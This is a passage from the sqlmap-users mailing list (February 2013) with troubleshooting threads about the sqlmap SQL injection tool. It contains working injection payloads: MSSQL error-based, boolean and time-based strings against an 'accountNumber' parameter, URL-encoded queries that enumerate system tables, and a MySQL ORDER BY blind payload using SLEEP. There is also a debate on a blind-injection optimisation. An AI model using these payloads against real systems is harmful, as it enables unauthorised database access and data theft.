> sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20ORDE
> R%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name
> %29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..
> sysobjects.name
> %29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29
>
> HTTP response [#3] (200 OK):
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_feb
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] sqlmap can not support stacked queries in aspx+mssql?

[Miroslav S. <mir...@gm...>]

Hi.

sqlmap hasn't been able to detect that it's exploitable through stacking.
Maybe some characters are filtered out. Maybe you are using --proxy or
--tor which introduce lagging which are causing problems like yours.

Use --flush-session --time-sec=20 if you are going to retry.

The best way how you could help is by using payloads used by sqlmap in
detection phase (use -v 3 to see those) and trying those in browser. If you
are able to find out what's happening, report back.

Bye
On Feb 22, 2013 6:28 AM, "root" <ro...@cn...> wrote:

> ** ********
> hi,all
>
> sqlmap can not support stacked queries in aspx+mssql?
>
>
> [11:42:43] [CRITICAL] unable to prompt for an interactive operating system shell
>
>  via the back-end DBMS because stacked queries SQL injection is not supported
>
>
>
>                                                              thanks&Best
> Regards
>
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_feb
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] sqlmap can not support stacked queries in aspx+mssql?

[root <ro...@cn...>]

hi,all

sqlmap can not support stacked queries in aspx+mssql? 
            
[11:42:43] [CRITICAL] unable to prompt for an interactive operating system shell
 via the back-end DBMS because stacked queries SQL injection is not supported



                                                             thanks&Best Regards

[sqlmap-users] problems extracting table names

[Brian M. <Br...@EC...>]

SQlmap is able to extract db names, current user and backend info, but 
when I try to get tables I end up with junk data or nothing at all.  I 
find this strange because SQLmap has identified multiple injection 
methods and I am on a fast local connection with the target server. 
This is the log file with examples of good/bad data.

sqlmap identified the following injection points with a total of 118915 
HTTP(s) requests:
---
Place: POST
Parameter: accountNumber
     Type: boolean-based blind
     Title: Generic boolean-based blind - Parameter replace (original value)
     Payload: accountNumber=(SELECT (CASE WHEN (4906=4906) THEN 1111111 
ELSE 1/(SELECT 0) 
END))&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register

     Type: error-based
     Title: Microsoft SQL Server/Sybase error-based - Parameter replace
     Payload: 
accountNumber=(CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR(100)+CHAR(58)+(SELECT 
(CASE WHEN (3149=3149) THEN CHAR(49) ELSE CHAR(48) 
END))+CHAR(58)+CHAR(100)+CHAR(111)+CHAR(103)+CHAR(58))))&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register

     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
     Payload: accountNumber=-9196 OR 8333=(SELECT COUNT(*) FROM sysusers 
AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS 
sys5,sysusers AS sys6,sysusers AS 
sys7)&meterNumber=1111111&zipCode=78451&email=te...@te...&register=Register
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [21]:
[redacted]
current user:    [redacted]
current database:    [redacted]
current user is DBA:    False

[6 tables]
+------------------------------------------------------------------------------------------------------------------------
| dbo.[??4c0?4A00370?520?22??2d0040005a??00??2A??58??5f0?0d00000?3c??2
|
|dbo.[\n\n]
|
|dbo.[\n\n]
|
dbo.[\n\n]

dbo.[\n\n]
+------------------------------------------------------------------------------------------------------------------------

When I use --no-cast and --hex flags I get no data at all and when I 
don't use them I get junk data.  When I look at the raw request/response 
in every case I see sqlmap send a test request with no injection which 
generates a 200 response, then follows an attempt to read the number of 
tables which generates a 500 error with a number in the error message. 
Every follow on request generates a 200 OK response, which means that 
neither boolean nor error based methods are working and it falls back to 
time based which then also fails.  Of all the correct data gathered so 
far, all was through error messages.  However, specifying --technique=E 
--parse-errors does not gain any additional info.  Some selected 
examples from the logs related to this attempt follow:


./sqlmap.py -r /root/request --fresh-queries -o --hex --no-cast -D 
master --tables -t ~/sqlmap

[WARNING] it was not possible to count the number of entries for the SQL 
query provided. sqlmap will assume that it returns only one entry
[WARNING] in case of continuous data retrieval problems you are advised 
to try a switch '--no-cast' and/or switch '--hex'
[CRITICAL] unable to retrieve the tables for any database
[WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 18 times

%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29

HTTP response [#2] (500 Internal Server Error):
[Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when 
converting the nvarchar value ':omd:0x00000167:dog:' to data type int.

%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%29%2C1%2C100%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20AND%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20NOT%20IN%20%28SELECT%20TOP%200%20master.sys.fn_varbintohexstr%28CAST%28master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20ORDE
R%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29

HTTP response [#3] (200 OK):

Re: [sqlmap-users] exp blind

[Miroslav S. <mir...@gm...>]

Hi.

You haven't told anything that could help. Neither switches/options used,
neither tamper scripts used, nothing.

You are using some custom tamper script(s) as I can see "/*!50000" in
payload (we don't have this in our tamper scripts).

Nevertheless, I've tried to reproduce your run with --technique=T
--tamper="between,versionedmorekeywords,ifnull2ifisnull"
--dbs against our testing environment and everything works out of box.

Kind regards,
Miroslav Stampar

On Thu, Feb 21, 2013 at 5:22 PM, Кирилл Бельков <li...@gm...> wrote:

> Hello, all.
>
> I'm trying to exploit the blind injection in the following query:
>
> $var = $_GET['var'];
> SELECT id,name FROM people ORDER BY $var
>
> sqlmap find vulnerabilities, but can not be used.
>
> sqmap sends the following query:
>
> name AND 561/*!50000=*/IF((ORD(MID((/*!50000SELECT*/
> IF(ISNULL(/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
> CHAR)),CHAR(32),/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
> CHAR)) FROM /*!50000information_schema*/.SCHEMATA),1,1)) NOT BETWEEN 0 AND
> 1),SLEEP(5),561)
>
> [22:20:36] [ERROR] unable to retrieve the number of databases
>
> but it does not work. May interfere with some kind of filter.
>
> But my request in browser url:
>
> index.php?var=CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM
> /*!50000information_schema*/.SCHEMATA limit 0,1) NOT BETWEEN 0 AND 65 THEN
> sleep(10) ELSE date END
>
> It takes a successful ... How can I get sqlmap use my method of attack from
> the one it uses by default.
>
> Sincerely, Kirill
>
> p.s. sorry for my bad english
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_feb
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] exp blind

[Кирилл Б. <li...@gm...>]

Hello, all.

I'm trying to exploit the blind injection in the following query:

$var = $_GET['var'];
SELECT id,name FROM people ORDER BY $var

sqlmap find vulnerabilities, but can not be used.

sqmap sends the following query:

name AND 561/*!50000=*/IF((ORD(MID((/*!50000SELECT*/
IF(ISNULL(/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
CHAR)),CHAR(32),/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS
CHAR)) FROM /*!50000information_schema*/.SCHEMATA),1,1)) NOT BETWEEN 0 AND
1),SLEEP(5),561)

[22:20:36] [ERROR] unable to retrieve the number of databases

but it does not work. May interfere with some kind of filter.

But my request in browser url:

index.php?var=CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM
/*!50000information_schema*/.SCHEMATA limit 0,1) NOT BETWEEN 0 AND 65 THEN
sleep(10) ELSE date END

It takes a successful ... How can I get sqlmap use my method of attack from
the one it uses by default.

Sincerely, Kirill

p.s. sorry for my bad english

Re: [sqlmap-users] Comparative precomputation

[Julius K. <jul...@gm...>]

User specified regexps?

2013/2/20 Miroslav Stampar <mir...@gm...>

> Andres.
>
> On Wed, Feb 20, 2013 at 3:11 PM, Andres Riancho <and...@gm...>wrote:
>
>> Miroslav,
>>
>> On Wed, Feb 20, 2013 at 4:15 AM, Miroslav Stampar
>> <mir...@gm...> wrote:
>> > Hi.
>> >
>> > In theory this works, in practice it doesn't. We already overturned 2-3
>> guys
>> > proposing this. Today's pages are too dynamic (banners, promos, etc.).
>>
>> But sqlmap already supports comparing pages with minor differences
>> (using difflib, correct?)
>>
> Yes, and it does the best among all tools.
>
>>
>> > Also,
>> > you would need a parameter value with a big covering range (lots of
>> > different values).
>>
>> 256 different rows for a table doesn't seem to be something difficult
>> to find; while not possible in all cases I agree.
>>
> It's a difficult to find, trust me. Also, how to "differentiate" 256
> different cases when you have 256 different cases of BANNERs in plain
> refresh of pages.
>
>>
>> > Also, whoever wrote this don't have a clue about this subject: ' The
>> > attacker would then take a checksum of the returned html data'. This is
>> > being done in kiddish scripts. Real SQLi tool knows that checksum is
>> faaar
>> > from reliable.
>>
>> See difflib above.
>>
> Seen
>
>>
>> > Anyway, answer is no.
>>
>> I think you're disregarding a good idea (if correctly implemented it
>> provides a 8-times performance improvement) way too fast.
>> Implementation is going to be difficult, but the benefits are great,
>>
> I am not disregarding a good idea. It's good in THEORY, but not in
> practice (THEORY != PRACTICE). You can make a tool your own and try it
> yourself on real life web sites. I am sure that you'll
> be disappointed really quickly.
>
> Anyway, it's not a practical idea at all. Cold fusion is also a great
> idea. Maybe that would be smarter to implement than this one.
>
> Bye
>
>>
>> > Kind regards,
>> > Miroslav Stampar
>> >
>> > On Feb 20, 2013 2:11 AM, "Julius Kivimäki" <jul...@gm...>
>> > wrote:
>> >>
>> >> Should probably look into adding this,
>> >>
>> http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation
>> >>
>> >>
>> ------------------------------------------------------------------------------
>> >> Everyone hates slow websites. So do we.
>> >> Make your web apps faster with AppDynamics
>> >> Download AppDynamics Lite for free today:
>> >> http://p.sf.net/sfu/appdyn_d2d_feb
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sql...@li...
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Everyone hates slow websites. So do we.
>> > Make your web apps faster with AppDynamics
>> > Download AppDynamics Lite for free today:
>> > http://p.sf.net/sfu/appdyn_d2d_feb
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> --
>> Andrés Riancho
>> Project Leader at w3af - http://w3af.org/
>> Web Application Attack and Audit Framework
>> Twitter: @w3af
>> GPG: 0x93C344F3
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] Comparative precomputation

[Miroslav S. <mir...@gm...>]

p.s.:

https://github.com/sqlmapproject/sqlmap/issues/298

On Wed, Feb 20, 2013 at 3:16 PM, Miroslav Stampar <
mir...@gm...> wrote:

> Andres.
>
> On Wed, Feb 20, 2013 at 3:11 PM, Andres Riancho <and...@gm...>wrote:
>
>> Miroslav,
>>
>> On Wed, Feb 20, 2013 at 4:15 AM, Miroslav Stampar
>> <mir...@gm...> wrote:
>> > Hi.
>> >
>> > In theory this works, in practice it doesn't. We already overturned 2-3
>> guys
>> > proposing this. Today's pages are too dynamic (banners, promos, etc.).
>>
>> But sqlmap already supports comparing pages with minor differences
>> (using difflib, correct?)
>>
> Yes, and it does the best among all tools.
>
>>
>> > Also,
>> > you would need a parameter value with a big covering range (lots of
>> > different values).
>>
>> 256 different rows for a table doesn't seem to be something difficult
>> to find; while not possible in all cases I agree.
>>
> It's a difficult to find, trust me. Also, how to "differentiate" 256
> different cases when you have 256 different cases of BANNERs in plain
> refresh of pages.
>
>>
>> > Also, whoever wrote this don't have a clue about this subject: ' The
>> > attacker would then take a checksum of the returned html data'. This is
>> > being done in kiddish scripts. Real SQLi tool knows that checksum is
>> faaar
>> > from reliable.
>>
>> See difflib above.
>>
> Seen
>
>>
>> > Anyway, answer is no.
>>
>> I think you're disregarding a good idea (if correctly implemented it
>> provides a 8-times performance improvement) way too fast.
>> Implementation is going to be difficult, but the benefits are great,
>>
> I am not disregarding a good idea. It's good in THEORY, but not in
> practice (THEORY != PRACTICE). You can make a tool your own and try it
> yourself on real life web sites. I am sure that you'll
> be disappointed really quickly.
>
> Anyway, it's not a practical idea at all. Cold fusion is also a great
> idea. Maybe that would be smarter to implement than this one.
>
> Bye
>
>>
>> > Kind regards,
>> > Miroslav Stampar
>> >
>> > On Feb 20, 2013 2:11 AM, "Julius Kivimäki" <jul...@gm...>
>> > wrote:
>> >>
>> >> Should probably look into adding this,
>> >>
>> http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation
>> >>
>> >>
>> ------------------------------------------------------------------------------
>> >> Everyone hates slow websites. So do we.
>> >> Make your web apps faster with AppDynamics
>> >> Download AppDynamics Lite for free today:
>> >> http://p.sf.net/sfu/appdyn_d2d_feb
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sql...@li...
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Everyone hates slow websites. So do we.
>> > Make your web apps faster with AppDynamics
>> > Download AppDynamics Lite for free today:
>> > http://p.sf.net/sfu/appdyn_d2d_feb
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> --
>> Andrés Riancho
>> Project Leader at w3af - http://w3af.org/
>> Web Application Attack and Audit Framework
>> Twitter: @w3af
>> GPG: 0x93C344F3
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm




-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Comparative precomputation

[Miroslav S. <mir...@gm...>]

Andres.

On Wed, Feb 20, 2013 at 3:11 PM, Andres Riancho <and...@gm...>wrote:

> Miroslav,
>
> On Wed, Feb 20, 2013 at 4:15 AM, Miroslav Stampar
> <mir...@gm...> wrote:
> > Hi.
> >
> > In theory this works, in practice it doesn't. We already overturned 2-3
> guys
> > proposing this. Today's pages are too dynamic (banners, promos, etc.).
>
> But sqlmap already supports comparing pages with minor differences
> (using difflib, correct?)
>
Yes, and it does the best among all tools.

>
> > Also,
> > you would need a parameter value with a big covering range (lots of
> > different values).
>
> 256 different rows for a table doesn't seem to be something difficult
> to find; while not possible in all cases I agree.
>
It's a difficult to find, trust me. Also, how to "differentiate" 256
different cases when you have 256 different cases of BANNERs in plain
refresh of pages.

>
> > Also, whoever wrote this don't have a clue about this subject: ' The
> > attacker would then take a checksum of the returned html data'. This is
> > being done in kiddish scripts. Real SQLi tool knows that checksum is
> faaar
> > from reliable.
>
> See difflib above.
>
Seen

>
> > Anyway, answer is no.
>
> I think you're disregarding a good idea (if correctly implemented it
> provides a 8-times performance improvement) way too fast.
> Implementation is going to be difficult, but the benefits are great,
>
I am not disregarding a good idea. It's good in THEORY, but not in practice
(THEORY != PRACTICE). You can make a tool your own and try it yourself on
real life web sites. I am sure that you'll be disappointed really quickly.

Anyway, it's not a practical idea at all. Cold fusion is also a great idea.
Maybe that would be smarter to implement than this one.

Bye

>
> > Kind regards,
> > Miroslav Stampar
> >
> > On Feb 20, 2013 2:11 AM, "Julius Kivimäki" <jul...@gm...>
> > wrote:
> >>
> >> Should probably look into adding this,
> >>
> http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation
> >>
> >>
> ------------------------------------------------------------------------------
> >> Everyone hates slow websites. So do we.
> >> Make your web apps faster with AppDynamics
> >> Download AppDynamics Lite for free today:
> >> http://p.sf.net/sfu/appdyn_d2d_feb
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sql...@li...
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >
> >
> ------------------------------------------------------------------------------
> > Everyone hates slow websites. So do we.
> > Make your web apps faster with AppDynamics
> > Download AppDynamics Lite for free today:
> > http://p.sf.net/sfu/appdyn_d2d_feb
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> --
> Andrés Riancho
> Project Leader at w3af - http://w3af.org/
> Web Application Attack and Audit Framework
> Twitter: @w3af
> GPG: 0x93C344F3
>



-- 
Miroslav Stampar
http://about.me/stamparm